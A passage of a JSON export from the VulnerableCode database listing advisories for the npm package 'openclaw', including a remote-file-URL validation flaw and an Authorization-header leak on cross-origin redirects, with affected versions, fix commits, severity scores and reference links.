vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-e4ac-qm17-qbf5"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-haxd-ps1x-h3ch"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kxmf-d7w1-xfcv"},{"vulnerability":"VCID-ma62-gtan-97au"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mv8b-cryt-u3g8"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9k
a6"},{"vulnerability":"VCID-ntwt-jkgr-sffu"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-nw4r-wjgs-8qc1"},{"vulnerability":"VCID-p7gx-9usz-yyew"},{"vulnerability":"VCID-p7v5-jqhq-nbhz"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-pj41-sunw-vbcj"},{"vulnerability":"VCID-psms-gauf-tkbz"},{"vulnerability":"VCID-q6ne-sw1r-xkd1"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-qjss-tvgk-3ubk"},{"vulnerability":"VCID-r5bw-c2py-9udf"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-una1-gxkk-t3bp"},{"vulnerability":"VCID-v9cd-65tf-p3f8"},{"vulnerability":"VCID-vfbb-bpy9-87ey"},{"vulnerability":"VCID-vy8v-np82-r3b5"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w4p1-sxdg-hyha"},{"vulnerability":"VCID-w58d-6veg-uugy"},{"vulnerability":"VCID-wmr3-83u3-6qdb"},{"vulnerability":"VCID-wyce-qxau-mqff"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-xfgw-ua7r-abbr"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xnvm-rp36-vyaj"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-y7sd-j9xn-qffs"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-z8mj-pnbe-wqej"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"},{"vulnerability":"VCID-zunq-wnnf-k3fw"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.31"}],"aliases":["CVE-2026-41296","GHSA-9p3r-hh9g-5cmg"],"risk_score":4.5,"exploitability":"0.5","weighted_severity":"9.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID
-xvhd-w4tv-tqhr"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/91425?format=json","vulnerability_id":"VCID-xyck-sspa-4ba2","summary":"OpenClaw: Windows media loaders accepted remote-host file URLs before local path validation\n## Summary\nWindows local-media handling accepted remote-host file URLs and UNC-style paths before local-path validation, so network-hosted file targets could be treated as local content.\n\n## Affected Packages / Versions\n- Package: `openclaw` (npm)\n- Affected: < 2026.3.22\n- Fixed: >= 2026.3.22\n- Latest released tag checked: `v2026.3.23-2` (`630f1479c44f78484dfa21bb407cbe6f171dac87`)\n- Latest published npm version checked: `2026.3.23-2`\n\n## Fix Commit(s)\n- `4fd7feb0fd4ec16c48ed983980dba79a09b3aaf5`\n- `93880717f1cd34feaa45e74e939b7a5256288901`\n\n## Release Status\nThe fix shipped in `v2026.3.22` and remains present in `v2026.3.23` and `v2026.3.23-2`.\n\n## Code-Level Confirmation\n- src/infra/local-file-access.ts now rejects remote-host file: URLs and UNC/network paths as non-local input.\n- src/media/web-media.ts, src/media-understanding/attachments.normalize.ts, and src/agents/sandbox-paths.ts all route through the shared local-file guard.\n\nOpenClaw thanks @RacerZ-fighting, @Fushuling for 
reporting.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-34426","reference_id":"","reference_type":"","scores":[{"value":"0.00048","scoring_system":"epss","scoring_elements":"0.15181","published_at":"2026-06-07T12:55:00Z"},{"value":"0.00048","scoring_system":"epss","scoring_elements":"0.15223","published_at":"2026-06-06T12:55:00Z"},{"value":"0.00048","scoring_system":"epss","scoring_elements":"0.15233","published_at":"2026-06-05T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-34426"},{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/commit/4fd7feb0fd4ec16c48ed983980dba79a09b3aaf5","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/commit/4fd7feb0fd4ec16c48ed983980dba79a09b3aaf5"},{"reference_url":"https://github.com/openclaw/openclaw/commit/93880717f1cd34feaa45e74e939b7a5256288901","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/commit/93880717f1cd34feaa45e74e939b7a5256288901"},{"reference_url":"https://github.com/openclaw/openclaw/commit/b57b680c0c34de907d57f60c38fb358e82aef8f7","reference_id":"","reference_type":"","scores":[{"value":"7.6","scoring_system":"cvssv3.1","
scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:H/A:N"},{"value":"5.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:A/VC:L/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-03T16:16:50Z/"}],"url":"https://github.com/openclaw/openclaw/commit/b57b680c0c34de907d57f60c38fb358e82aef8f7"},{"reference_url":"https://github.com/openclaw/openclaw/pull/59182","reference_id":"","reference_type":"","scores":[{"value":"7.6","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:H/A:N"},{"value":"5.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:A/VC:L/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-03T16:16:50Z/"}],"url":"https://github.com/openclaw/openclaw/pull/59182"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-h3x4-hc5v-v2gm","reference_id":"","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"5.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-h3x4-hc5v-v2gm"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-34426","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_sys
tem":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-34426"},{"reference_url":"https://www.vulncheck.com/advisories/openclaw-approval-bypass-via-environment-variable-normalization","reference_id":"","reference_type":"","scores":[{"value":"7.6","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:H/A:N"},{"value":"5.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:A/VC:L/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-03T16:16:50Z/"}],"url":"https://www.vulncheck.com/advisories/openclaw-approval-bypass-via-environment-variable-normalization"},{"reference_url":"https://github.com/advisories/GHSA-h3x4-hc5v-v2gm","reference_id":"GHSA-h3x4-hc5v-v2gm","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-h3x4-hc5v-v2gm"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/109983?format=json","purl":"pkg:npm/openclaw@2026.3.22","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1j3m-fecr-f7cn"},{"vulnerability":"VCID-1p3b-pfnn-x7ad"},{"vulnerability":"VCID-1p5p-eth5-3ufu"},{"vulnerability":"VCID-1pbz-8rnx-dkhe"},{"vulnerability":"VCID-1smq-mbty-jkaj"},{"vulnerability":"VCID-24m7-jx1g-hqde"},{"vulnerability":"VCID-258k-a4dw-tfae"},{"vulnerability":"VCID-26kp-dbu2-pqej"},{"vulnerability":"VCID-26sg-e29u-hkf3"},{"vulnerability":"VCID-26sv-grsd-abcw"},{"vulnerability":"VCID-294z-6z8j-97bx"},{"vulnerability":"VCID-29a1-7ar7
-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2h6a-becf-x7ej"},{"vulnerability":"VCID-2hca-3v8f-f3e8"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-2uqu-k42d-1baq"},{"vulnerability":"VCID-2v8n-mnws-jfc9"},{"vulnerability":"VCID-2wr9-h42m-a7ev"},{"vulnerability":"VCID-32zs-2zs9-uufs"},{"vulnerability":"VCID-356u-h788-pkgt"},{"vulnerability":"VCID-37ep-9smd-zuh9"},{"vulnerability":"VCID-384t-z1h8-pfft"},{"vulnerability":"VCID-38g8-39ek-xbat"},{"vulnerability":"VCID-3bdd-a9nw-13bn"},{"vulnerability":"VCID-3wsw-d4z2-dydt"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-3zwq-dz2u-pqgv"},{"vulnerability":"VCID-3zx4-t8cj-kbfn"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-4hz5-f2pw-3yb4"},{"vulnerability":"VCID-4jwj-6s5z-wbeq"},{"vulnerability":"VCID-4nwq-14y4-xkhp"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-4uqc-3h1c-4yhs"},{"vulnerability":"VCID-4urc-4536-pqhk"},{"vulnerability":"VCID-5atj-2a7b-57g5"},{"vulnerability":"VCID-5rgx-2krs-guck"},{"vulnerability":"VCID-6849-th74-yqd5"},{"vulnerability":"VCID-6bxd-kbse-sudx"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-733f-57ds-xugm"},{"vulnerability":"VCID-73cz-n29z-uqem"},{"vulnerability":"VCID-75yr-sbce-nkah"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7dyw-9b37-yqh4"},{"vulnerability":"VCID-7ntr-5dr5-9uf8"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-7wmr-v7zb-6fc9"},{"vulnerability":"VCID-7z2s-k6ty-ekg1"},{"vulnerability":"VCID-8uzb-xmf8-hbca"},{"vulnerability":"VCID-8z7r-a8dv-eueb"},{"vulnerability":"VCID-96jd-x87b-s3ey"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9jjv-aa8k-rke1"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-9pj9-7b12-jbea"},{"vulnerability":"VCID-9uyu-y9qv-u7e1"},{"vulnerability":"VCID-9xgq-vtg2-jucq"},{"vulnerability":"VCID-9xrt-mv81
-3yc8"},{"vulnerability":"VCID-9yxw-fj1c-tff9"},{"vulnerability":"VCID-a2p8-ydn6-3bbr"},{"vulnerability":"VCID-a2wx-7b8h-c3h1"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-atn7-pn13-3fgb"},{"vulnerability":"VCID-axp9-mt9z-gkgw"},{"vulnerability":"VCID-aye6-1fwu-nkc5"},{"vulnerability":"VCID-b9w3-w2nq-cqg6"},{"vulnerability":"VCID-bg1d-gmxy-wkc6"},{"vulnerability":"VCID-bgwh-spue-yybk"},{"vulnerability":"VCID-bk76-1ctt-tkaw"},{"vulnerability":"VCID-bkya-73v8-bber"},{"vulnerability":"VCID-bnfh-rsk9-cfea"},{"vulnerability":"VCID-brfj-4shr-qkgc"},{"vulnerability":"VCID-bumq-54sb-6ua7"},{"vulnerability":"VCID-bzw7-yvu2-yqa2"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-c4yt-z48z-zygv"},{"vulnerability":"VCID-c76v-4577-n7c6"},{"vulnerability":"VCID-carm-gpgh-wbbf"},{"vulnerability":"VCID-cbuu-4d6c-rben"},{"vulnerability":"VCID-csnc-r6fv-j3en"},{"vulnerability":"VCID-cvmw-sxfq-dyhz"},{"vulnerability":"VCID-cvxu-rdbu-abd2"},{"vulnerability":"VCID-cwd3-ecym-sfaw"},{"vulnerability":"VCID-d3qp-5wm9-aqfp"},{"vulnerability":"VCID-d864-qy75-c3dx"},{"vulnerability":"VCID-d8v2-gft5-buee"},{"vulnerability":"VCID-da47-zdf1-mfgf"},{"vulnerability":"VCID-dbcw-brhj-k7hs"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-djqx-bwuu-4uc1"},{"vulnerability":"VCID-dmse-bb22-rkcj"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-e4ac-qm17-qbf5"},{"vulnerability":"VCID-fekn-d6f3-xfa6"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-g3hg-peh1-tudm"},{"vulnerability":"VCID-g8r6-x6s5-uydq"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-gvam-2net-8kc5"},{"vulnerability":"VCID-haxd-ps1x-h3ch"},{"vulnerability":"VCID-hd4w-s3dp-nubj"},{"vulnerability":"VCID-hkqd-6khg-m3hj"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-j8fb-fhyc
-33fu"},{"vulnerability":"VCID-j92n-5217-9bhj"},{"vulnerability":"VCID-j96c-kau3-7fag"},{"vulnerability":"VCID-jbwa-scg3-efeq"},{"vulnerability":"VCID-jdqk-kv8u-xqa9"},{"vulnerability":"VCID-jhah-j2td-t3dp"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-jtxm-z4vv-cqg7"},{"vulnerability":"VCID-k3up-1vdf-2uh9"},{"vulnerability":"VCID-k52b-966p-ybbk"},{"vulnerability":"VCID-k5da-7tht-w3bs"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kzgh-7f6h-kfd1"},{"vulnerability":"VCID-ma62-gtan-97au"},{"vulnerability":"VCID-mcz5-wgu1-z7g7"},{"vulnerability":"VCID-mggy-bv5s-5uax"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mv8b-cryt-u3g8"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nfva-pukn-uqch"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-ntwt-jkgr-sffu"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-nw4r-wjgs-8qc1"},{"vulnerability":"VCID-p7gx-9usz-yyew"},{"vulnerability":"VCID-p7me-4bzz-83cm"},{"vulnerability":"VCID-p7v5-jqhq-nbhz"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-pa1f-qzsh-efa9"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pc9z-x5wk-8ue7"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-psms-gauf-tkbz"},{"vulnerability":"VCID-q6ne-sw1r-xkd1"},{"vulnerability":"VCID-q9jf-srt4-fbcg"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-qjss-tvgk-3ubk"},{"vulnerability":"VCID-qjvc-etb4-qbfv"},{"vulnerability":"VCID-r5bw-c2py-9udf"},{"vulnerability":"VCID-r9y1-z2ax-z3e2"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-s3wz-3yzf-ybhz"},{"vulnerability":"VCID-sja9-6t41-hud8"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-t991-75e7-ykdv"},{"vulnerability":"VCID-te8f-snty-j7hh"},{"vulnerability":"VCID-tf28-1z2z
-5yfn"},{"vulnerability":"VCID-tk9h-nqrz-uugp"},{"vulnerability":"VCID-u1ru-vdfp-x3hu"},{"vulnerability":"VCID-u6hw-ffpj-4yd9"},{"vulnerability":"VCID-u9cw-crg5-1kbs"},{"vulnerability":"VCID-una1-gxkk-t3bp"},{"vulnerability":"VCID-uy97-p1ex-y7df"},{"vulnerability":"VCID-v1bp-hw9a-yffz"},{"vulnerability":"VCID-v91b-1nmx-ckcx"},{"vulnerability":"VCID-v9cd-65tf-p3f8"},{"vulnerability":"VCID-vfbb-bpy9-87ey"},{"vulnerability":"VCID-vktg-77tu-vycv"},{"vulnerability":"VCID-vm8g-hrvu-quhm"},{"vulnerability":"VCID-vqrj-z6tx-rff2"},{"vulnerability":"VCID-vtqt-bgz7-yub6"},{"vulnerability":"VCID-vx5d-3d98-7kf3"},{"vulnerability":"VCID-vy8v-np82-r3b5"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2rd-2j4p-gfgw"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w4p1-sxdg-hyha"},{"vulnerability":"VCID-w58d-6veg-uugy"},{"vulnerability":"VCID-watb-49vx-yub1"},{"vulnerability":"VCID-wkye-je9r-1fba"},{"vulnerability":"VCID-wmr3-83u3-6qdb"},{"vulnerability":"VCID-wut7-y72y-9ucb"},{"vulnerability":"VCID-wx44-n3fr-skah"},{"vulnerability":"VCID-wyce-qxau-mqff"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-x4hn-ygbg-mkep"},{"vulnerability":"VCID-x794-wfnf-1ugf"},{"vulnerability":"VCID-x7uw-s9a6-fybd"},{"vulnerability":"VCID-xfgw-ua7r-abbr"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xnvm-rp36-vyaj"},{"vulnerability":"VCID-xpr3-hg3h-z3bz"},{"vulnerability":"VCID-xryt-a83q-q7et"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-xvhd-w4tv-tqhr"},{"vulnerability":"VCID-xz8s-hj5s-wfgj"},{"vulnerability":"VCID-xzg5-ren5-p7gw"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-y7sd-j9xn-qffs"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ykwt-tdpa-3bft"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-ynup-4v9e-tbh4"},{"vulnerability":"VCID-yp2w-pc58-9bf6"},{"vulnerability":"VCID-ywrn-52gx-f3ad"},{"vulnerability":"VCID-z7wa-tw2t
-vqas"},{"vulnerability":"VCID-z8mj-pnbe-wqej"},{"vulnerability":"VCID-zac2-wjyt-27af"},{"vulnerability":"VCID-zb5t-hhkm-kfeh"},{"vulnerability":"VCID-zf3q-78js-k7ce"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zkum-rn42-yyfs"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"},{"vulnerability":"VCID-zunq-wnnf-k3fw"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.22"}],"aliases":["CVE-2026-34426","GHSA-h3x4-hc5v-v2gm"],"risk_score":3.4,"exploitability":"0.5","weighted_severity":"6.8","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-xyck-sspa-4ba2"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/89013?format=json","vulnerability_id":"VCID-xz8s-hj5s-wfgj","summary":"OpenClaw: Media download follows cross-origin redirects with Authorization headers intact\n## Summary\nMedia download follows cross-origin redirects with Authorization headers intact\n\n## Current Maintainer Triage\n- Status: open\n- Normalized severity: medium\n- Assessment: Shipped v2026.3.28 media downloads forwarded Authorization across cross-origin redirects, a real in-scope credential-leak class that fits medium.\n\n## Affected Packages / Versions\n- Package: `openclaw` (npm)\n- Latest published npm version: `2026.3.31`\n- Vulnerable version range: `<=2026.3.28`\n- Patched versions: `>= 2026.3.31`\n- First stable tag containing the fix: `v2026.3.31`\n\n## Fix Commit(s)\n- `e704323ff388ed21f6963f9b8e0b1b8dfaaabc5f` — 2026-03-31T19:57:42+09:00\n\nOpenClaw thanks @AntAISecurityLab for 
reporting.","references":[{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"6.0","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/commit/e704323ff388ed21f6963f9b8e0b1b8dfaaabc5f","reference_id":"","reference_type":"","scores":[{"value":"6.0","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/commit/e704323ff388ed21f6963f9b8e0b1b8dfaaabc5f"},{"reference_url":"https://github.com/openclaw/openclaw/releases/tag/v2026.3.31","reference_id":"","reference_type":"","scores":[{"value":"6.0","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/releases/tag/v2026.3.31"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-68v4-hmwv-f43h","reference_id":"","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"6.0","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-68v4-hmwv-f43h"},{"reference_url":"https://github.com/advisories/GHSA-68v4-hmwv-f43h","reference_id":"GHSA-68v4-hmwv-f43h","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA
-68v4-hmwv-f43h"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/109907?format=json","purl":"pkg:npm/openclaw@2026.3.31","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1pbz-8rnx-dkhe"},{"vulnerability":"VCID-258k-a4dw-tfae"},{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2h6a-becf-x7ej"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-356u-h788-pkgt"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-3zwq-dz2u-pqgv"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-4urc-4536-pqhk"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-733f-57ds-xugm"},{"vulnerability":"VCID-73cz-n29z-uqem"},{"vulnerability":"VCID-75yr-sbce-nkah"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7ntr-5dr5-9uf8"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-7z2s-k6ty-ekg1"},{"vulnerability":"VCID-96jd-x87b-s3ey"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-9xgq-vtg2-jucq"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-bgwh-spue-yybk"},{"vulnerability":"VCID-bkya-73v8-bber"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-cbuu-4d6c-rben"},{"vulnerability":"VCID-d8v2-gft5-buee"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-dmse-bb22-rkcj"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-e4ac-qm17-qbf5"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-haxd-ps1x-h3ch"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{
